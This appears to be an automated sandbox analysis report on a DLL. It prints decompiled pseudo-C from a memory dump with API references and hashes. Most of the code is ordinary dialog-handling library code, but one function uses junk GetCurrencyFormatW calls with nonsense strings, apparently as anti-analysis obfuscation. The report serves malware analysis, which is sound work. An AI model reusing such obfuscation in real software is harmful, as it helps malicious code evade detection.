										__eflags = _t149;
										if(_t149 == 0) {
											L56:
											_t251 = 0;
											_v28 = 0;
											_t150 = E1000A8F0(_t229, _t232, _t260,  *_t240);
											_v44 = _v44 & 0;
											_v36 = _t150;
											_t152 = _v32 - _t229;
											__eflags = _t152;
											_v40 = 2;
											if(_t152 == 0) {
												_t153 = E1001A7F1(_v36, _t240);
												_t232 =  *(_t240 + 8) & 0x0000ffff;
												__eflags = _t232 - 0x1b;
												if(__eflags > 0) {
													__eflags = _t232 - 0x25;
													if(_t232 < 0x25) {
														goto L75;
													} else {
														__eflags = _t232 - 0x26;
														if(_t232 <= 0x26) {
															_v44 = 1;
															goto L110;
														} else {
															__eflags = _t232 - 0x28;
															if(_t232 <= 0x28) {
																L110:
																_t171 = E1001A7F1(_v24, _t240);
																__eflags = _t171 & 0x00000001;
																if((_t171 & 0x00000001) != 0) {
																	goto L75;
																} else {
																	__eflags = _v44;
																	_t232 = _a4;
																	_push(0);
																	if(_v44 == 0) {
																		_t172 = E1000F80A(_t229, _t232, _t240);
																	} else {
																		_t172 = E1000F7BC(_t229, _t232, _t240);
																	}
																	_t254 = _t172;
																	__eflags = _t254;
																	if(_t254 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t254 + 8);
																		if( *(_t254 + 8) != 0) {
																			_t232 = _a4;
																			E1000F366(_a4, _t254);
																		}
																		__eflags =  *(_t254 + 4);
																		if( *(_t254 + 4) == 0) {
																			_t173 =  *_t254;
																			__eflags = _t173;
																			if(_t173 == 0) {
																				_t232 = _a4;
																				_t174 = E1001A8AF(_a4, _v24, _v44);
																			} else {
																				_t174 = E1000A8F0(_t229, _t232, _t260, _t173);
																			}
																			_t242 = _t174;
																			__eflags = _t242;
																			if(_t242 == 0) {
																				goto L75;
																			} else {
																				_t229 = 0;
																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
																				E1001A8E9(_t242);
																				__eflags =  *(_t254 + 8);
																				if( *(_t254 + 8) != 0) {
																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
																				}
																				goto L125;
																			}
																		} else {
																			_t232 =  *(_t254 + 4);
																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
																			goto L125;
																		}
																	}
																}
															} else {
																__eflags = _t232 - 0x2b;
																if(_t232 != 0x2b) {
																	goto L75;
																} else {
																	goto L97;
																}
															}
														}
													}
													goto L126;
												} else {
													if(__eflags == 0) {
														L103:
														_t243 = 0;
														__eflags = 0;
														goto L104;
													} else {
														__eflags = _t232 - 3;
														if(_t232 == 3) {
															goto L103;
														} else {
															__eflags = _t232 - 9;
															if(_t232 == 9) {
																__eflags = _t153 & 0x00000002;
																if((_t153 & 0x00000002) != 0) {
																	goto L75;
																} else {
																	_t188 = GetKeyState(0x10);
																	_t255 = _a4;
																	__eflags = _t188;
																	_t229 = 0 | _t188 < 0x00000000;
																	_t232 = _t255;
																	_t189 = E1000F223(_t255, 0, _t188 < 0);
																	__eflags = _t189;
																	if(_t189 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t189 + 4);
																		if( *(_t189 + 4) == 0) {
																			_t190 =  *_t189;
																			__eflags = _t190;
																			if(_t190 == 0) {
																				_t232 = _t255;
																				_t191 = E10007A94(_t255, _v36, _t229);
																			} else {
																				_t191 = E1000A8F0(_t229, _t232, _t260, _t190);
																			}
																			_t244 = _t191;
																			__eflags = _t244;
																			if(_t244 != 0) {
																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
																				E1001A8E9(_t244);
																				E1001AAB3(_t229, _t232, _t260, _v24, _t244);
																				_pop(_t232);
																			}
																		} else {
																			_t195 =  *(_t189 + 4);
																			_t232 = _t195;
																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
																		}
																		goto L125;
																	}
																}
																goto L126;
															} else {
																__eflags = _t232 - 0xd;
																if(_t232 == 0xd) {
																	L97:
																	__eflags = _t153 & 0x00000004;
																	if((_t153 & 0x00000004) != 0) {
																		goto L75;
																	} else {
																		_t182 = E1001A88E(_v24);
																		__eflags = _t182 & 0x00000010;
																		_pop(_t232);
																		if((_t182 & 0x00000010) == 0) {
																			_t183 = E1001AC34(_a4);
																		} else {
																			_t251 = _v24;
																			_t232 = _t251;
																			_t183 = E1000EF39(_t251);
																		}
																		_t243 = 0;
																		__eflags = _t251;
																		_v40 = _t183;
																		if(_t251 != 0) {
																			L105:
																			_t232 = _t251;
																			_t184 = E1000EFB3(_t251);
																			__eflags = _t184;
																			if(_t184 != 0) {
																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
																					goto L75;
																				} else {
																					_push(_t243);
																					_push(_t243);
																					_push(_t243);
																					_push(1);
																					_push(0xfffffdd9);
																					_push(_t251);
																					_v8 = _t243;
																					E1000F010();
																					_v8 = _v8 | 0xffffffff;
																					goto L125;
																				}
																			} else {
																				MessageBeep(_t243);
																				goto L75;
																			}
																		} else {
																			L104:
																			_t251 = E1001AB2E(_a4, _v40);
																			__eflags = _t251 - _t243;
																			if(_t251 == _t243) {
																				goto L75;
																			} else {
																				goto L105;
																			}
																		}
																	}
																	goto L126;
																} else {
																	goto L75;
																}
															}
														}
													}
												}
												goto L79;
											} else {
												_t198 = _t152;
												__eflags = _t198;
												if(_t198 == 0) {
													L62:
													_t199 = E1001A7F1(_v36, _t240);
													__eflags = _v32 - 0x102;
													if(_v32 != 0x102) {
														L64:
														_t232 =  *(_t240 + 8) & 0x0000ffff;
														__eflags = _t232 - 9;
														if(_t232 != 9) {
															L66:
															__eflags = _t232 - 0x20;
															if(__eflags == 0) {
																goto L54;
															} else {
																_push(_t240);
																_t200 = E1001AEE4(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
																__eflags = _t200;
																if(_t200 == 0) {
																	goto L75;
																} else {
																	_t201 =  *(_t200 + 4);
																	__eflags = _t201;
																	if(_t201 == 0) {
																		goto L75;
																	} else {
																		_t232 = _t201;
																		E10014E50(_t201, _t240);
																		L125:
																		_v28 = 1;
																	}
																}
																goto L79;
															}
														} else {
															__eflags = _t199 & 0x00000002;
															if((_t199 & 0x00000002) != 0) {
																goto L75;
															} else {
																goto L66;
															}
														}
													} else {
														__eflags = _t199 & 0x00000084;
														if((_t199 & 0x00000084) != 0) {
															goto L75;
														} else {
															goto L64;
														}
													}
												} else {
													__eflags = _t198 != 4;
													if(_t198 != 4) {
														L75:
														_t154 = _a4;
														__eflags =  *(_t154 + 0x3c) & 0x00001000;
														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
															__eflags = _t165;
															_v28 = _t165;
															if(_t165 != 0) {
																_t167 = E1000A8F0(_t229, _t232, _t260, GetFocus());
																__eflags = _t167 - _v24;
																if(_t167 != _v24) {
																	E1001AA46(_t232, E1000A8F0(_t229, _t232, _t260, GetFocus()));
																	_pop(_t232);
																}
															}
														}
														L79:
														_t155 = IsWindow(_v52);
														__eflags = _t155;
														if(_t155 != 0) {
															E1001AAB3(_t229, _t232, _t260, _v24, E1000A8F0(_t229, _t232, _t260, GetFocus()));
															_pop(_t234);
															_t161 = IsWindow(_v48);
															__eflags = _t161;
															if(_t161 != 0) {
																E1001AC61(_a4, _v24, E1000A8F0(_t229, _t234, _t260, GetFocus()));
															}
														}
														_t156 = _v28;
													} else {
														__eflags = _v24;
														if(_v24 != 0) {
															L61:
															__eflags =  *(_t240 + 8) - 0x20;
															if( *(_t240 + 8) == 0x20) {
																goto L75;
															} else {
																goto L62;
															}
														} else {
															_t204 = GetKeyState(0x12);
															__eflags = _t204;
															if(_t204 >= 0) {
																goto L75;
															} else {
																goto L61;
															}
														}
													}
												}
											}
										} else {
											_t256 = _t149;
											while(1) {
												__eflags =  *(_t256 + 0x50);
												if( *(_t256 + 0x50) != 0) {
													break;
												}
												_t211 = E1000A8F0(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
												__eflags = _t211 - _a4;
												if(_t211 != _a4) {
													_t256 = E1000A8F0(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
													__eflags = _t256;
													if(_t256 != 0) {
														continue;
													}
												}
												break;
											}
											__eflags = _t256;
											if(_t256 == 0) {
												L45:
												__eflags = _v32 - 0x101;
												if(_v32 == 0x101) {
													L48:
													__eflags = _t256;
													if(_t256 == 0) {
														goto L55;
													} else {
														_t257 =  *(_t256 + 0x50);
														__eflags = _t257;
														if(_t257 == 0) {
															goto L55;
														} else {
															_t206 = _a8->wParam & 0x0000ffff;
															__eflags = _t206 - 0xd;
															if(_t206 != 0xd) {
																L52:
																__eflags = _t206 - 0x1b;
																if(_t206 != 0x1b) {
																	goto L55;
																} else {
																	__eflags =  *(_t257 + 0x84) & 0x00000002;
																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
																		goto L55;
																	} else {
																		goto L54;
																	}
																}
															} else {
																__eflags =  *(_t257 + 0x84) & 0x00000001;
																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
																	L54:
																	_t156 = 0;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _v32 - _t229;
													if(_v32 == _t229) {
														goto L48;
													} else {
														__eflags = _v32 - 0x102;
														if(_v32 != 0x102) {
															L55:
															_t240 = _a8;
															goto L56;
														} else {
															goto L48;
														}
													}
												}
											} else {
												_t207 =  *(_t256 + 0x50);
												__eflags = _t207;
												if(_t207 == 0) {
													goto L45;
												} else {
													__eflags =  *(_t207 + 0x58);
													if( *(_t207 + 0x58) == 0) {
														goto L45;
													} else {
														_t208 =  *(_t207 + 0x58);
														_t232 =  *_t208;
														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
														__eflags = _t209;
														if(_t209 != 0) {
															goto L45;
														} else {
															_t156 = _t209 + 1;
														}
													}
												}
											}
										}
									} else {
										goto L34;
									}
								}
								return E1001FC9C(_t156);
							} else {
								_t232 =  *(_t238 + 4);
								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
								__eflags = _t215 & 0x08000000;
								if((_t215 & 0x08000000) == 0) {
									goto L20;
								} else {
									goto L23;
								}
							}
						} else {
							_t216 =  *(_t238 + 4);
							if(_t216 == 0) {
								_t217 =  *_t238;
							} else {
								_t217 =  *(_t216 + 0x24);
							}
							if(_t217 == 0) {
								goto L21;
							} else {
								if(IsWindowEnabled(_t217) == 0) {
									L23:
									__eflags = _t238 - _v8;
									if(_t238 == _v8) {
										break;
									} else {
										__eflags = _v8;
										if(_v8 == 0) {
											_v8 = _t238;
										}
										_t247 = _t247 + 1;
										__eflags = _t247 - 0x200;
										if(_t247 < 0x200) {
											continue;
										} else {
											break;
										}
									}
								} else {
									L20:
									_t141 = _t238;
									L28:
									return _t141;
								}
							}
						}
					} else {
						_t232 = _a4;
						_t238 = E1000F223(_a4, _t238, 0);
						if(_t238 == 0) {
							break;
						} else {
							goto L14;
						}
					}
					L126:
				}
				_t141 = 0;
				__eflags = 0;
				goto L28;
			}

0x1001aee4
0x1001aee5
0x1001aee7
0x1001aee8
0x1001aeec
0x1001aeed
0x1001aeee
0x1001aef5
0x1001aefa
0x1001aefe
0x1001af00
0x1001af08
0x1001af0c
0x1001af0e
0x1001af13
0x1001af16
0x1001af18
0x1001af1c
0x1001af1c
0x1001af24
0x1001af26
0x1001af2b
0x00000000
0x00000000
0x1001af35
0x1001af45
0x00000000
0x00000000
0x1001af47
0x00000000
0x00000000
0x00000000
0x00000000
0x1001af35
0x1001af49
0x1001af49
0x1001af16
0x1001af0c
0x1001af4b
0x1001af4b
0x1001af4d
0x1001af59
0x1001af5f
0x00000000
0x00000000
0x1001af62
0x1001af69
0x1001af6a
0x1001af7c
0x1001af7e
0x1001afa1
0x1001afa1
0x1001afa4
0x1001afd4
0x1001afd9
0x1001afda
0x1001afe1
0x1001afe6
0x1001afe9
0x1001afeb
0x1001aff5
0x1001afed
0x1001afed
0x1001afed
0x1001aff8
0x1001affb
0x1001affe
0x1001b008
0x1001b00b
0x1001b010
0x1001b015
0x1001b017
0x1001b01a
0x1001b024
0x1001b02a
0x1001b02d
0x00000000
0x00000000
0x00000000
0x00000000
0x1001b01c
0x1001b01c
0x1001b022
0x1001b033
0x1001b033
0x1001b035
0x1001b0e2
0x1001b0e4
0x1001b0e6
0x1001b0e9
0x1001b0ee
0x1001b0f1
0x1001b0f7
0x1001b0f7
0x1001b0f9
0x1001b100
0x1001b18a
0x1001b18f
0x1001b193
0x1001b196
0x1001b2d3
0x1001b2d6
0x00000000
0x1001b2dc
0x1001b2dc
0x1001b2df
0x1001b38f
0x00000000
0x1001b2e5
0x1001b2e5
0x1001b2e8
0x1001b396
0x1001b39a
0x1001b39f
0x1001b3a1
0x00000000
0x1001b3a7
0x1001b3a7
0x1001b3ab
0x1001b3ae
0x1001b3b0
0x1001b3b9
0x1001b3b2
0x1001b3b2
0x1001b3b2
0x1001b3be
0x1001b3c0
0x1001b3c2
0x00000000
0x1001b3c8
0x1001b3c8
0x1001b3cc
0x1001b3ce
0x1001b3d2
0x1001b3d2
0x1001b3d7
0x1001b3db
0x1001b3eb
0x1001b3ed
0x1001b3ef
0x1001b3fc
0x1001b402
0x1001b3f1
0x1001b3f2
0x1001b3f2
0x1001b407
0x1001b409
0x1001b40b
0x00000000
0x1001b411
0x1001b417
0x1001b41a
0x1001b41d
0x1001b422
0x1001b425
0x1001b432
0x1001b432
0x00000000
0x1001b425
0x1001b3dd
0x1001b3dd
0x1001b3e3
0x00000000
0x1001b3e3
0x1001b3db
0x1001b3c2
0x1001b2ee
0x1001b2ee
0x1001b2f1
0x00000000
0x00000000
0x00000000
0x00000000
0x1001b2f1
0x1001b2e8
0x1001b2df
0x00000000
0x1001b19c
0x1001b19c
0x1001b32b
0x1001b32b
0x1001b32b
0x00000000
0x1001b1a2
0x1001b1a2
0x1001b1a5
0x00000000
0x1001b1ab
0x1001b1ab
0x1001b1ae
0x1001b24d
0x1001b24f
0x00000000
0x1001b255
0x1001b257
0x1001b25d
0x1001b262
0x1001b265
0x1001b268
0x1001b26d
0x1001b272
0x1001b274
0x00000000
0x1001b27a
0x1001b27a
0x1001b27e
0x1001b293
0x1001b295
0x1001b297
0x1001b2a5
0x1001b2a7
0x1001b299
0x1001b29a
0x1001b29a
0x1001b2ac
0x1001b2ae
0x1001b2b0
0x1001b2b9
0x1001b2be
0x1001b2c7
0x1001b2cd
0x1001b2cd
0x1001b280
0x1001b280
0x1001b286
0x1001b288
0x1001b288
0x00000000
0x1001b27e
0x1001b274
0x00000000
0x1001b1b4
0x1001b1b4
0x1001b1b7
0x1001b2f7
0x1001b2f7
0x1001b2f9
0x00000000
0x1001b2ff
0x1001b302
0x1001b307
0x1001b309
0x1001b30a
0x1001b31b
0x1001b30c
0x1001b30c
0x1001b30f
0x1001b311
0x1001b311
0x1001b320
0x1001b322
0x1001b324
0x1001b327
0x1001b342
0x1001b342
0x1001b344
0x1001b349
0x1001b34b
0x1001b359
0x1001b35c
0x00000000
0x1001b362
0x1001b362
0x1001b363
0x1001b364
0x1001b365
0x1001b367
0x1001b36c
0x1001b36d
0x1001b370
0x1001b378
0x00000000
0x1001b378
0x1001b34d
0x1001b34e
0x00000000
0x1001b34e
0x1001b329
0x1001b32d
0x1001b338
0x1001b33a
0x1001b33c
0x00000000
0x00000000
0x00000000
0x00000000
0x1001b33c
0x1001b327
0x00000000
0x00000000
0x00000000
0x00000000
0x1001b1b7
0x1001b1ae
0x1001b1a5
0x1001b19c
0x00000000
0x1001b106
0x1001b107
0x1001b107
0x1001b108
0x1001b134
0x1001b138
0x1001b13d
0x1001b144
0x1001b14a
0x1001b14a
0x1001b14e
0x1001b152
0x1001b158
0x1001b158
0x1001b15c
0x00000000
0x1001b162
0x1001b162
0x1001b169
0x1001b16e
0x1001b170
0x00000000
0x1001b172
0x1001b172
0x1001b175
0x1001b177
0x00000000
0x1001b179
0x1001b17a
0x1001b17c
0x1001b438
0x1001b438
0x1001b438
0x1001b177
0x00000000
0x1001b170
0x1001b154
0x1001b154
0x1001b156
0x00000000
0x00000000
0x00000000
0x00000000
0x1001b156
0x1001b146
0x1001b146
0x1001b148
0x00000000
0x00000000
0x00000000
0x00000000
0x1001b148
0x1001b10a
0x1001b10a
0x1001b10d
0x1001b1bd
0x1001b1bd
0x1001b1c0
0x1001b1c6
0x1001b1ce
0x1001b1d4
0x1001b1d6
0x1001b1d9
0x1001b1e4
0x1001b1e9
0x1001b1ec
0x1001b1f7
0x1001b1fc
0x1001b1fc
0x1001b1ec
0x1001b1d9
0x1001b1fd
0x1001b206
0x1001b208
0x1001b20a
0x1001b21e
0x1001b224
0x1001b228
0x1001b22a
0x1001b22c
0x1001b23d
0x1001b23d
0x1001b22c
0x1001b242
0x1001b113
0x1001b113
0x1001b116
0x1001b129
0x1001b129
0x1001b12e
0x00000000
0x00000000
0x00000000
0x00000000
0x1001b118
0x1001b11a
0x1001b120
0x1001b123
0x00000000
0x00000000
0x00000000
0x00000000
0x1001b123
0x1001b116
0x1001b10d
0x1001b108
0x1001b03b
0x1001b041
0x1001b043
0x1001b043
0x1001b047
0x00000000
0x00000000
0x1001b04f
0x1001b054
0x1001b057
0x1001b064
0x1001b066
0x1001b068
0x00000000
0x00000000
0x1001b068
0x00000000
0x1001b057
0x1001b06a
0x1001b06c
0x1001b091
0x1001b091
0x1001b098
0x1001b0a8
0x1001b0a8
0x1001b0aa
0x00000000
0x1001b0ac
0x1001b0ac
0x1001b0af
0x1001b0b1
0x00000000
0x1001b0b3
0x1001b0b6
0x1001b0ba
0x1001b0be
0x1001b0c9
0x1001b0c9
0x1001b0cd
0x00000000
0x1001b0cf
0x1001b0cf
0x1001b0d6
0x00000000
0x00000000
0x00000000
0x00000000
0x1001b0d6
0x1001b0c0
0x1001b0c0
0x1001b0c7
0x1001b0d8
0x1001b0d8
0x00000000
0x00000000
0x00000000
0x1001b0c7
0x1001b0be
0x1001b0b1
0x1001b09a
0x1001b09a
0x1001b09d
0x00000000
0x1001b09f
0x1001b09f
0x1001b0a6
0x1001b0df
0x1001b0df
0x00000000
0x00000000
0x00000000
0x00000000
0x1001b0a6
0x1001b09d
0x1001b06e
0x1001b06e
0x1001b071
0x1001b073
0x00000000
0x1001b075
0x1001b075
0x1001b079
0x00000000
0x1001b07b
0x1001b07b
0x1001b081
0x1001b084
0x1001b087
0x1001b089
0x00000000
0x1001b08b
0x1001b08b
0x1001b08b
0x1001b089
0x1001b079
0x1001b073
0x1001b06c
0x00000000
0x00000000
0x00000000
0x1001b022
0x1001b24a
0x1001afa6
0x1001afa6
0x1001afab
0x1001afae
0x1001afb3
0x00000000
0x00000000
0x00000000
0x00000000
0x1001afb3
0x1001af80
0x1001af80
0x1001af85
0x1001af8c
0x1001af87
0x1001af87
0x1001af87
0x1001af90
0x00000000
0x1001af92
0x1001af9b
0x1001afb5
0x1001afb5
0x1001afb8
0x00000000
0x1001afba
0x1001afba
0x1001afbd
0x1001afbf
0x1001afbf
0x1001afc2
0x1001afc3
0x1001afc9
0x00000000
0x00000000
0x00000000
0x00000000
0x1001afc9
0x1001af9d
0x1001af9d
0x1001af9d
0x1001afcd
0x1001afd1
0x1001afd1
0x1001af9b
0x1001af90
0x1001af6c
0x1001af6c
0x1001af76
0x1001af7a
0x00000000
0x00000000
0x00000000
0x00000000
0x1001af7a
0x00000000
0x1001af6a
0x1001afcb
0x1001afcb
0x00000000

APIs

GetFocus.USER32(?), ref: 1001AF37
IsWindowEnabled.USER32(?), ref: 1001AF93
__EH_prolog3_catch.LIBCMT ref: 1001AFE1
GetFocus.USER32(00000028), ref: 1001B001
GetParent.USER32(?), ref: 1001B04C
GetParent.USER32(?), ref: 1001B05C
GetKeyState.USER32 ref: 1001B11A
IsDialogMessageA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B1CE
GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B1E1
GetFocus.USER32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B1EE
IsWindow.USER32(?), ref: 1001B206
GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B212
IsWindow.USER32(?), ref: 1001B228
GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B22E
GetKeyState.USER32 ref: 1001B257
MessageBeep.USER32(00000000), ref: 1001B34E

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
String ID:
API String ID: 656273425-0
Opcode ID: 7cea107795b1e2e3285d96fe1b936d401bf20cc77758f65a3f6ffed830a0db35
Instruction ID: 56f928e57334fa6d51f2d895fa8adec4f86d4fba5de9bb308060e6b64de8da3e
Opcode Fuzzy Hash: 7cea107795b1e2e3285d96fe1b936d401bf20cc77758f65a3f6ffed830a0db35
Instruction Fuzzy Hash: 12F1DF35900A16AFDB11DFA0C894AAE7BF5EF49390F528029F815AF162DB34EDC1CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10003567 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 143
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E10003567(int _a4) {
				long _t40;
				signed int _t54;
				int _t55;
				signed int _t63;
				void* _t87;
				short* _t89;

				_t87 = _a4;
				_t35 = 0;
				if(_t87 != 0) {
					_t89 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
					if( *((intOrPtr*)(_t87 + 0x10)) != 0) {
						_a4 =  *((intOrPtr*)(_t87 + 4));
						_t63 = GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						 *((intOrPtr*)(_t63 *  *0x100440d8 +  *((intOrPtr*)( *_t87 + 0x28)) + _a4))(_a4, 0, 0);
						_t35 = 0;
					}
					 *0x10046a64( *((intOrPtr*)(_t87 + 0x30)) + GetCurrencyFormatW(_t35, 0x11d4, _t89, _t35, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc * 8);
					_t40 = 0;
					if( *((intOrPtr*)(_t87 + 8)) == 0) {
						L9:
						if( *((intOrPtr*)(_t87 + 4)) != _t40) {
							 *((intOrPtr*)(_t87 + 0x20))( *((intOrPtr*)(_t87 + 4)), 0, GetCurrencyFormatW(_t40, 0x11d4, _t89, _t40, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x8000,  *((intOrPtr*)(_t87 + 0x34)));
							_t40 = 0;
						}
						return HeapFree(GetProcessHeap(), _t40, _t87);
					} else {
						_a4 = 0;
						if(GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc +  *((intOrPtr*)(_t87 + 0xc)) <= 0) {
							L8:
							 *0x10046a64( *((intOrPtr*)(_t87 + 8)) + GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc * 4);
							_t40 = 0;
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t54 = GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							_t55 = 0;
							if( *((intOrPtr*)( *((intOrPtr*)(_t87 + 8)) + (_t54 *  *0x100440cc + _a4) * 4)) != 0) {
								 *((intOrPtr*)(_t87 + 0x2c))( *((intOrPtr*)( *((intOrPtr*)(_t87 + 8)) + (GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + _a4) * 4)),  *((intOrPtr*)(_t87 + 0x34)));
								_t55 = 0;
							}
							_a4 = _a4 + 1;
						} while (_a4 < GetCurrencyFormatW(_t55, 0x11d4, _t89, _t55, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc +  *((intOrPtr*)(_t87 + 0xc)));
						goto L8;
					}
				}
				return 0;
			}

0x10003568
0x1000356c
0x10003570
0x10003582
0x1000358c
0x1000359f
0x100035a3
0x100035bd
0x100035bf
0x100035bf
0x100035df
0x100035e5
0x100035eb
0x100036b4
0x100036b7
0x100036de
0x100036e4
0x100036e4
0x00000000
0x100035f1
0x100035ff
0x10003611
0x1000368b
0x100036ab
0x100036b2
0x00000000
0x00000000
0x00000000
0x00000000
0x10003613
0x10003613
0x10003623
0x10003635
0x1000363a
0x10003660
0x10003665
0x10003665
0x10003667
0x10003685
0x00000000
0x10003613
0x100035eb
0x100036f9

APIs

GetCurrencyFormatW.KERNEL32 ref: 100035A3
GetCurrencyFormatW.KERNEL32 ref: 100035CF
??3@YAXPAX@Z.MSVCRT ref: 100035DF
GetCurrencyFormatW.KERNEL32 ref: 10003603
GetCurrencyFormatW.KERNEL32 ref: 10003623
GetCurrencyFormatW.KERNEL32 ref: 1000364D
GetCurrencyFormatW.KERNEL32 ref: 10003679
GetCurrencyFormatW.KERNEL32 ref: 1000369B
??3@YAXPAX@Z.MSVCRT ref: 100036AB
GetCurrencyFormatW.KERNEL32 ref: 100036CA
GetProcessHeap.KERNEL32(00000000,000022B9,?,?,?,?,?,?,?,?,?,?,10003044,10003057,10003090,1000309F), ref: 100036E8
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,10003044,10003057,10003090,1000309F,00000000), ref: 100036EF

Strings

xadqsavcbdfewescGADW, xrefs: 10003596, 100035C6, 100035F6, 10003618, 10003644, 10003670, 10003690, 100036C1
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 1000357A, 10003582, 1000359C, 100035CC, 100035FC, 1000361F, 1000364A, 10003676, 10003697, 100036C7

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat$??3@Heap$FreeProcess
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 447117116-3161301136
Opcode ID: c986ef1d440be94ff09f6e1d70f323da872e541a9ac047334e8279f144c68349
Instruction ID: f2d026fc60e697fd50327b110b185c24fe47079f9fec1f7b52e43e207d21a45c
Opcode Fuzzy Hash: c986ef1d440be94ff09f6e1d70f323da872e541a9ac047334e8279f144c68349
Instruction Fuzzy Hash: 7B415B71104705BFE215EB60CD85E67BBECEB4A385F028819F742DB5A1D732E8548F64

Uniqueness

Uniqueness Score: -1.00%

Function 1000A2C4 Relevance: 19.7, APIs: 13, Instructions: 176
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000A2C4(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E1000EEC4(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
